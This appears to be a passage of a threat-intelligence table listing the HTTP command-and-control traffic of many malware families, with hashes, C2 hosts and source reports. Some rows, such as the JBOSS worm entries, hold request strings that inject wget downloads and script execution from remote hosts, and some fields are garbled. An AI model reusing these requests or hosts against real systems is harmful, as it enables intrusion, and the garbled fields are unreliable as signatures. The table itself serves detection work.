221 | 2013-04-28 | CRIME | IRCbot | GET | /check_ver.php?version=1.09 | /check_ver.php | /check_ver.php?version=1.09 User-Agent: - Host: rc.rizalof.com Cache-Control: no-cache HTTP/1.0 200 (OK) | - | 6716a417f82ccedf0f860b735ac0187 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 2013-04 | |||||
222 | 2013-04-28 | APT | IXESHE | GET | /AWS26329.jsp? UrFvwIJIOKTRyfxR9KNRqhg8lcPr/ CGjUwP8y JUs7RjH7OinJ/85cgrqiP8jKGjpqgb/ wTrO7OIjhxoHcGaFa URqK/aHophHLd23K=NHk= a9oQ hvDQaLky8qo/RnJz42A | /AWS | User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: dot.faawan.com:443 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) | 443 | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | 2012 | ||||||
223 | 2013-04-28 | APT | IXESHE AES | GET | /AES210001 129016878.jsp?UrFwUIO3h7ofgw QInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk= +LLQhpkZ9LOhGbgqvJghHci7M | /AES | /AES210001 129016878.jsp?UrFwUIO3h7ofgwQInYPRbkQaHVM9Bih7kZ9rO+pKUrbklllsgfOk= +LLQhpkZ9LOhGbgqvJghHci7M User-Agent: Mozilla/4.O (compatible; MSIE 5.01; Windows NT 5.0) Host: 140.119.44.181 Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | 2012 | |||||||
224 | 2013-04-28 | CRIME | JBOSS worm | GET | /zecmd/zecmd.jsp?comment=perl+lindb.pl | /zecmd.jsp?comment= | http://eromang.zataz.com/2011/10/25/jboss-worm-analysis-in-details/ | ||||||||||
225 | 2013-04-28 | CRIME | JBOSS worm | GET | /idssvc/idssvc.jsp?comment= wget+http://webstats.dyndns.info/javadd.tar.gz | idssvc.jsp?comment= | |||||||||||
226 | 2013-04-28 | CRIME | JBOSS worm | GET | /iesvc/iesvc.jsp?comment=wget+http://magicstick.dyndns-remote.com/kisses.tar.gz | idssvc.jsp?comment= | |||||||||||
227 | 2013-04-28 | APT | Letsgo / TabMsgSQL | GET | /indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regc ode%20=%20'IXLCGIXELZ' | /indexbak.asp?rands= | User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: <hostname> Connection: Keep-Alive | Mozilla/4.0 (compatible; ) | TabMsgSQL crafts raw SQL queries and passes these as encoded URL parameters when communicating with the C2 server.Every HTTP URI generated by the malware will have the “rands=” URL parameter | 052ec04866e4a67f31845d656531830d | http://intelreport.mandiant.com/ | 2011-06 | |||||
228 | 2013-04-28 | APT | Letsgo / TabMsgSQL | GET | /safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20 from%20tab_message%20where%20toid%20= %20'198'%20order%20by%20id%20asc | /1.asp?rands= | User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: 202.105.39.39 Connection: Keep-Alive Cookie: ASPSESSIONIDSADRDCST=JPKFDKEADBDBCOMGDJNKDDLN | Mozilla/4.0 (compatible; ) | After the victim is successfully registered, it sends queries to the database for messages for its ID (in this case the assigned ID of the victim is 198) | 052ec04866e4a67f31845d656531830d | http://www.matasano.com/research/PEST-CONTROL.pdf | 2011-06 | |||||
229 | 2013-04-28 | APT | Letsgo / TabMsgSQL | GET | /safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20 (mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20 ('0','victim','192.168.1.12','145.42.112.19', '2011-06-08%2013:45:54', '2011-06-08%2013:45:54','NMQVPTXFBH') | /1.asp?rands= | User-Agent: Mozilla/4.0 (compatible; ) Accept: / Host: 202.105.39.39 Connection: Keep-Alive Cookie: ASPSESSIONIDSADRDCST=JPKFDKEADBDBCOMGDJNKDDLN | Mozilla/4.0 (compatible; ) | When this Trojan is first executed it sends a SQL query to the database to see if it has already been registered there. If not, it will send a request to do so | 052ec04866e4a67f31845d656531830d | http://www.matasano.com/research/PEST-CONTROL.pdf | 2011-06 | |||||
230 | 2013-04-28 | APT | Letsgo / TabMsgSQL downloader | GET | /new/iistart.html | /iistart.html | Accept: / User-Agent: lt-764-238+Windows+NT+5.171 Host: 122.147.13.8 | lt-764-238+Windows+NT+5.171 | 2b1c03b4e34a123e5317182e6159e38a | http://www.cyberengineeringservices.com/trojan-letsgo-analysis/ | 2011-06 | ||||||
231 | 2013-04-28 | APT | Likseput | GET | /index.html | /index.html | User-Agent: 5.1 10:59 DELLXT\Laura Host: nasa.usnewssite.com Cache-Control: no-cache | 5.1 10:59 <PC-Name>\<Username> | E019E37F19040059AB5662563F06B609 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2012-08 | |||||
232 | 2013-04-28 | APT | Lingbo (?) | POST | /windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM >QAxADYA%26 meta%3DMDAwMGhIÆÑuMDk %3D%26id%3Dlfdxfircvscxggb | /search% | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; NET CLR 1.1.4322) Host: globalizationinteriorgov.net Content-Length: 14277 Connection: Keep-Alive Cache-Control: no-cache 2.r.)... ‘.5.. ,—. .i.-..dq...R.’3.w....>N.B.—z. .e90)rw.b-b9QGhT. .. .3. .n.>j.hLe | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; NET CLR 1.1.4322) | 20DD4DD02C2B17A40B26843AA0C660F6 | http://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html | 2011-01 | ||||||
233 | 2013-04-28 | APT | Luckycat - WIMMIE | POST | /count/count.php?m=c&n=[HOSTNAME]_ | /count.php?m=c&n= | Accept: / UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: [HOSTNAME] Content-Length: 0 Connection: Keep-Alive Pragma: no-cache | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; . NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) | WIMMIE malware do not leave much network fingerprint. However, the following is an identifiable HTTP C&C communication fingerprint—count.php?m=c&n=[HOSTNAME]_[MAC_ADDRESS]_[CAMPAIGN_CODE]@. This format can also be seen in the URL inside the script when /namespace:\\root\subscription path __eventconsumer is typed in the command line for WMI. | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_luckycat_redux.pdf | 2012 | ||||||
234 | 2013-04-28 | CRIME | Medfos | GET | /uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww== | /id= | Host: www.microsoft.com User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0 Cache-Control: no-cache | Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0 | 0512E73000BCCCE5AFD2E9329972208A | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | 4/27/2013 | ||||||
235 | 2013-04-28 | APT | MiniASP | GET | /device_<decoded ID string>asp?device_t=<random 10 digits>&key=<random 8 lowercaseletters>&device_id=<decoded ID string>&cv=<random 17 lowercase letters> | /device_ | Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, / Accept-Language: en-gb User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: <decoded_server> | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | MINIASP is a backdoor that retrieves encoded commands over HTTP. If the malware has not been executed with any parameters, it decodes its ID and server strings. The malware issues arequest to the decoded server name | e476e4a24f8b4ff4c8a0b260aa35fc9f | http://intelreport.mandiant.com/ | 2012-11 | |||||
236 | 2013-04-28 | APT | MiniASP | GET | /record.asp?device_t=<random 10 digits> &key=<random 8 lowercase letters>&device_id=<decoded ID string>&cv=<random 17 lowercase letters>&result=<URLencoded result data> | /record.asp?device_t= | Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml,image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/vnd.ms- excel, application/vnd.ms-powerpoint, application/msword, / Accept-Language: en-gb User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: <decoded_server> | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2;.NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) | Once the malware has completed processing the commands received, it sends arequest | e476e4a24f8b4ff4c8a0b260aa35fc9f | http://intelreport.mandiant.com/ | 2012-11 | |||||
237 | 2013-04-28 | APT | Miniduke | POST | /index.php | /index.php | Content-Type: multipart/form-data; boundary=----------------------- 2856073314169 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; windows NT 5.1; .NET CLR 2.0.50727; .NT CLR 2.0.4506.2151; .N&T CLR 3.5.30729; InfoPath.2) Host: bolsilloner.es Content-Length: 347 Connection: Keep-Alive Cache-Control: no-cache ----------------------------2856073314169 Content-Disposition: form-data; name=”fname” ibarext32. blb ----------------------------2856073314169 Content-Disposition: form-data; nanie”i” b3cdbdo92e2ce ----------------------------I 2856073314169 Content-Disposition: form-data; name=’c’ 2 | Mozilla/4.0 (compatible; MSIE 7.0; windows NT 5.1; . NET CLR 2.0.50727; .NT CLR 2.0.4506.2151; .N&T CLR 3.5.30729; InfoPath.2) | http://www.fireeye.com/blog/technical/cyber-exploits/2013/02/its-a-kind-of-magic-1.html http://www.securelist.com/en/blog/208194129/The_MiniDuke_Mystery_PDF_0_day_Government_Spy_Assembler_0x29A_Micro_Backdoor | 2013-02 | |||||||
238 | 2013-04-28 | APT | Mirage | POST | /resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow | /resuIt?hl=en | Accept: / ..Accept-Laguage: en-us.. Uiser-Agent: Mozilla /4.0 (compatibIe; MSIE 6.0; Windows NT 5.1) Connection: close Content-Length: 293 Content-Type: appIcaton/x-www-form-urlencoded Ericodng: gzdp, deflate.Pragma: no-cache Host: (C&C):443 Mtdkj..21:DFkJL$KO #S%&t+,’r.ABCD_abcde(ghijklmnopqrstuvwxyz( I 9142@alv | Mozilla/4.0 (compatibIe; MSIE 6.0; Windows NT 5.1) | 443 | phone-home request | http://www.secureworks.com/cyber-threat-intelligence/threats/the-mirage-campaign/ | ||||||
239 | 2013-04-28 | APT | Mirage - later var | GET | /search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg | /search?hl=en&q= | ASH-1.3: 1 | Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) | Instead of the word "Mirage" used in earlier variants, later variants use the phrase "Neo, welcome to the desert of the real" | http://www.secureworks.com/cyber-threat-intelligence/threats/the-mirage-campaign/ | 2012-09 | ||||||
240 | 2013-04-28 | CRIME | Money loader | GET | <p>/get_xml?file_id=25227372 <p>/dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536 | /get_xml?file_id= | Accept: / User-Agent: tiny-dl/nix Host: takeinfo.ru" ============ /dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536 User-Agent: tiny-dl Host: binupdate.mail.ru Cache-Control: no-cache" | tiny-dl/nix tiny-dl | 4e801b46068b31b82dac65885a58ed9e | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/crimepcaps | 2013-04 | |||||
241 | 2013-04-28 | APT | Mongal | GET | /3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000000000000000000000000000000 0000 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: 61.178.77.169:84 Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) | C6F01A6AD70DA7A554D48BDBF7C7E065 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2013-01 | ||||||
242 | 2013-04-28 | APT | Murcy | GET | /150828 | /150828 | Connection: Keep-Alive Accept: / Host: path.alyac.org User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Extra-Data-Bind: DE6A34D80D43B930 Extra-Data-Space: 65536 Extra-Data: 4ZFNSAAEAAh2AoNAAAAAAgRCHACwoSogAjKhCCf/HA AVNAAAAeAAAgDBAAABIAAAs0kAAUAAAAQAAAAAooAA AIAAAAATAAAAKCAAAgKAAAgqAAAA4CAAAgNAAAAOAM DA3AgQAxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxAEEAzAQOAADA5AAMAkDAwAgNAkDAxAAAAMFAlB gcAYHApBwYAUGAgAAUAEGAjBwaAACAzAAAAAAATBQW AMFAUBQRA0EAAAwVA8EAXBQLAUEA4AQRAxxxxxxxxx xxxxxxxxxx2AAAAAAA Cache-Control: no-cache Pragma: no-cache Content-Length: 0 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) | The path in the HTTP requests is the computer’s tick count (i.e. the number of milliseconds since the system was started). The requests from the victim occurred approximately every 11 seconds when the computer was turned on. Accordingly, the number in the URI increased by approximately 11000 each request. | http://www.commandfive.com/papers/C5_APT_C2InTheFifthDomain.pdf | 2012-02 | ||||||
243 | 2013-04-28 | APT | Netravler | GET | /fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT | /nettraveler.asp?action=getcmd&hostid= | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Accept-Language: en-us Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.gami1.com Cache-Control: no-cache Cookie: ASPSESSIONIDSQTSRRAR=MGDPMPIBDGBLBKLNGDDDJCDP | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) | continued traffic after the initial callback | 1f26e5f9b44c28b37b6cd13283838366 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2013-01 | ||||
244 | 2013-04-28 | APT | Netravler | GET | /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX <very long string> UjfNI0fBFg3GI2GWcB8EVKIPlGwrkknFPSsHigx-LIIiZKrqD0pqgt | /nettraveler.asp?hostid= | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Accept-Language: en-us Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.gami1.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) | initial call back | 1f26e5f9b44c28b37b6cd13283838366 | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2013-01 | ||||
245 | 2013-04-28 | APT | Netravler | GET | <p> /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end <p> /nt2012/asp/nettraveler.asp?hostid= 411CD510&hostname=mikepc& amp;hostip=10.12.0.23&filename= travlerbackinfo-2012-1- | /nettraveler.asp?hostid= | Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Accept-Language: en-us Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Host: www.vipyandex.com Connection: Keep-Alive Cookie: ASPSESSIONIDCSBQCTCA=EFKILJMDFNHODIDELKHIFDMH HTTP/1.1 200 OK Connection: close Date: Sun, 07 Oct 2012 03:37:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 10 Content-Type: text/html Cache-control: private Success:88 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) | DA5832657877514306EDD211DEF61AFE | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2012-10 | |||||
246 | 2013-04-28 | APT | NfLog | GET | /IElog/TestURL.asp HTTP/1.0 | /IElog/ | /IElog/TestURL.asp HTTP/1.0 User-Agent: www Host: www.aviraco.com Content-Length: 10 Pragma: no-cache 1234567890 | www | D4859FC951652B3C9657F8621D4DB625 | http://contagiodump.blogspot.com/2012/02/feb-9-cve-2011-1980-msoffice-dll.html | 2012-02 | ||||||
247 | 2013-04-28 | APT | NfLog | POST | /NfLog/Nfile.asp | /NfLog/ | /NfLog/Nfile.asp Accept: / User-Agent: Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1) Host: www.mlitjcab.com Content-Length: 0 Cache-Control: no-cache | Mozilla/5.0 (compatible; MSIE 7.0;Windows NT 5.1) | 0612B3138179852A416379B3E85742EA | http://contagiodump.blogspot.com/2012/08/cve-2012-0158-generated-8861-password.html | 2012-08 | ||||||
248 | 2013-04-28 | APT | NTESSESS | GET | /6K8gL8.html | /6K8gL8.html | /6K8gL8.html Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, / Cache-Control: no-cache Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 69.39.133.114 Connection: Keep-Alive Cookie: NTESSESS=s9st0hzccBi; CONNECTID=01081318220 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | 692cb0fca66738055396e1e1c8f0d52c | http://www.cyberengineeringservices.com/malware-obfuscated-within-png-files-sample-2-2/ | 2011-05 | ||||||
249 | 2013-04-28 | APT | PNG trojan | GET | /index.htm | /index.htm | /index.htm User-Agent: Windows+NT+5.1 Host: www.muckleshoot.nsn.us Cache-Control: no-cache The content of index.htm is parsed for the HTML comment tag: <!--...--> | Windows+NT+5.1 | 1efc0c20b0445bc081890f16f59e672b | http://www.cyberengineeringservices.com/the-png-trojan-%E2%80%93-acrord32-exe/ | 2011-05 | ||||||
250 | 2013-04-28 | APT | Poison Ivy | GET | 256 bytes of seemingly random data after a successful TCP handshake, then 48 byte “keep-alive” requests | http://contagiodump.blogspot.com/2012/04/poisonivy-traffic.html | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf | 2012 | |||||||||
251 | 2013-04-28 | APT | RedOctober AuthInfo | POST | http://%s:%s%s | Host: %s:%s Pragma: no-cache Cache-Control: no-cache Content-length: %u Content-Type: application/x-www-form-urlencoded POSTDATA | Authinfo 2nd stage | 793c82efc65a43ed249a45ec7c69a388 428de53f1a1eaa040847b6456b7e5369 | http://www.securelist.com/en/analysis/204792268/Red_October_Detailed_Malware_Description_2_Second_Stage_of_Attack | ||||||||
252 | 2013-04-28 | APT | RedOctober Sysinfo | POST | /cgi-bin/nt/sk | /cgi-bin/nt/sk | Host: %CnC% Connection: close Content-Length: %d\r\n\r\n DATA | Sysinfo 2nd stage | e36b94cd608e3dfdf82b4e64d1e40681 a2fe73d01fd766584a0c54c971a0448a | http://www.securelist.com/en/analysis/204792268/Red_October_Detailed_Malware_Description_2_Second_Stage_of_Attack | 2013-01 | ||||||
253 | 2013-04-28 | APT | RegSubDat | POST | /5501000000/log | /5501000000/log | Accept: / Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 Host: ibm.asia-online.us:80 Content-Length: 90 Proxy-Connection: Keep-Alive | Mozilla/4.0 | c5860171f919761db9ee78ef3dac5ab4 | http://www.cyberengineeringservices.com/india-united-states-naval-cooperation-doc-analysis/ | 2012-12 | ||||||
254 | 2013-04-28 | APT | Sanny / Win32.Daws | POST | /write.php | /write.php | Host: board.nboard.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,/;q=0.5 Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip,deflate Accept-Charset: EUC-KR,utf-8;q=0.7,;q=0.7 Keep-Alive: 300 Connection: keep-alive Referer: http://board.nboard.net/form.php?db=kbaksan_1 Content-Type: application/x-www-form-urlencoded Content-Length: 5248 [snip] db=kbaksan_1&ch=19&name=zz.|zzz&email=&pw=1917qaz&ulink=&title=DELLXT_(0_0)&e5=0&e6=&e7=&html=2&text=fndpoGJ- nGkfaKu7KKsxvv&tlink=HTTP/1.1 302 Found | Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 | b00ae5492ce724fd01b926a7f7cb3e66 | http://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html | http://bit.ly/aptpcaps | 2012-12 | |||||
255 | 2013-04-28 | APT | Seasalt | GET | /postinfo.html | /postinfo.html | Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM Host: ubuntuguru.strangled.net Connection: Close | Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM | When SEASALT is first installed, it attempts to retrieve a hard-coded URL but the received data is never checked or processed. The malware uses a hard-coded HTTP user-agent string, as shown in an example HTTPrequest | f0726aadcf5d66daf528f79ba8507113 | http://intelreport.mandiant.com/ | 2012-09 | |||||
256 | 2013-04-28 | APT | Sofacy | POST | /~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01 | /cgi-bin/brvc.cgi? | /~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01 User-Agent: MSIE 8.0 Host: 200.106.145.122 Content-Length: 6 Cache-Control: no-cache | MSIE 8.0 | a2a188cbf74c1be52681f998f8e9b6b5 1DA0C961C7AF849071AB86CAAF846B2A | http://contagiodump.blogspot.com/2013/04/collection-of-pcap-files-from-malware.html | http://bit.ly/aptpcaps | 2012-10 | |||||
257 | 2013-04-28 | APT | Sofacy | POST | /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS | /cgi-bin/qfa.cgi? | /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS Referer: /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS User-Agent: MSIE 8.0 Host: 200.106.145.122 Cache-Control: no-cache | MSIE 8.0 | 1DA0C961C7AF849071AB86CAAF846B2A | http://bit.ly/aptpcaps | 2012-10 | ||||||
258 | 2013-04-28 | CRIME | Srizbi | GET | /cb_4.exe | /cb_4.exe | /cb_4.exe Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: spacestorminc.com Connection: Keep-Alive | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | 06E589B4E3AB93C6B16389DD79549A7A | http://www.fireeye.com/blog/technical/botnet-activities-research/2008/08/srizbi-alongwit.html | 2008-08 | ||||||
259 | 2013-04-28 | CRIME | Stabuniq | POST | /rssnews.php | /rssnews.php | /rssnews.php Content-Type: application/x-www-form-urlencoded Host: benhomelandefit.com Content-Length: 1093 Cache-Control: no-cache id=NzQxKDYoNig3&varname=SmdzdGc=&comp=QkNKSl5S&ver=UW9oYmlxdSZeVg==&src=NTREb3I=&sec=0&view=dWtnYWNocihjfmMmKyY5DHFrb3Z0cHVjKGN+YyYrJjkMcnRnaHVqZ3JpdChjfmMmKyY5DGVrYihjfmMmKyY5DGpnaGF2Z2VtKGN+YyYrJjkMSmdoYVN2YmdyY3QoY35jJismOQxla2IoY35jJismOQxla2IoY35jJismOQxSVkdzcmlFaWhoY2VyKGN+YyYrJjkMcXVlaHJgfyhjfmMmKyY5DGdqYShjfmMmKyY5DFJWR3NyaUVpaGhVcGUoY35jJismOQxwa3JpaWp1YihjfmMmKyY5DHFiYGthdChjfmMmKyY5DGtiayhjfmMmKyY5DGx3dShjfmMmKyY5DGNtdGgoY35jJismOQx1cGVuaXVyKGN+YyYrJjkMR2V0f2pvZVVjdHBvZWMoY35jJismOQxlcmBraWgoY35jJismOQxwa3JpaWp1YihjfmMmKyY5DHRzaGJqajU0KGN+YyYrJjkMdXZpaWp1cChjfmMmKyY5DGN+dmppdGN0KGN+YyYrJjkMdXBlbml1cihjfmMmKyY5DHVwZW5pdXIoY35jJismOQx1cGVuaXVyKGN+YyYrJjkMdXBlbml1cihjfmMmKyY5DHVwZW5pdXIoY35jJismOQxwa2dlcm5qdihjfmMmKyY5DGp1Z3V1KGN+YyYrJjkMdWN0cG9lY3UoY35jJismOQxxb2hqaWFpaChjfmMmKyY5DGV1dHV1KGN+YyYrJjkMdWt1dShjfmMmKyY5DFV/dXJjayYrJjkMXVV/dXJjayZWdGllY3V1WyYrJjkM&dat=&page=RTxaVnRpYXRnayZAb2pjdVoxK1xvdlpTaG9odXJnampadWtnYWNocihjfmM=&val=cnB5b3dub3BjZnRyZ2ZweWlyaXllYmdmZnhibHh4YWp5anN5b2x3YmxkeGRpcG9k&up=rpyownopcftrgfpy&xid=ZTU0N2BlPzMrZzc+NisyNWRiK2cyMzUrMDI1ZzNkNDBnNmA1 | F31B797831B36A4877AA0FD173A7A4A2 | http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html | 12/24/2012 | |||||||
260 | 2013-04-28 | APT | Sykipot / Wyksol | GET | /kys_allowget.asp?namegetkys.kys | /namegetkys.kys | /kys_allowget.asp?namegetkys.kys Accept: / User-Agent: HTTP-GET Host: www. top10member . corn Cache-Control: no-cache | http://www.sans.org/reading_room/whitepapers/malicious/detaile http://blog.trendmicro.com/the-sykipot-campaign/ | 2012 | ||||||||
261 | 2013-04-28 | APT | Taidoor | GET | /apzsr.php?id=021793111D309GE67E | /apzsr.php?id= | /apzsr.php?id=021793111D309GE67E User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: 211.234.117.141:443 Connection: Keep-Alive Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) | 443 | http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-detecting-apt-activity-with-network-traffic-analysis.pdf http://contagiodump.blogspot.com/2012/10/cve-2012-1535-sep9-2012-doc-data-for.html | http://bit.ly/aptpcaps | 2012 | |||||
262 | 2013-04-28 | APT | Tarsip Eclipse | GET | /blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0 | /redir?di= | /blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0 UA-CPU: x86 Accept: text/html;q=0.9,text/plain;q=0.8,application/xhtml+xml;q=0.7,image/gif;q=0.5,/;q=0.1 Accept-Language: en-us Accept-Encoding: gzip;q=0.8, deflate;q=0.5 Cookie: CLIP=<encoded host information> User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) Host: <C2 server address> Cache-Control: no-cache | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) | The TARSIP-ECLIPSE backdoor communicates with the C2 server over SSL on port 443 even if the TLS option is not set. Once an SSL session has been established with the server, the malware will make arequest To make therequest the malware will choose a random URI from the following list: /blg7_8newtpl/image/7/7_12/images/redir? /widget/widgets/wgt_static/flink? /s/lcms_/IDD/t/c.gif? /status/MutiqueryVP/main? /api/get_attention_num/adfshow? /uc/myshow/blog/misc/gif/show.asp? /A2/front/lm/mini/noborder/? /sub/cgi-bin/gmes? /sheq/por/blomofun/bord.aspx? /combo.action/bin/load.swf? /pp/core/cgi/wor.asp? /loa/database3/sun.html? | 123505024F9E5FF74CB6AA67D7FCC392 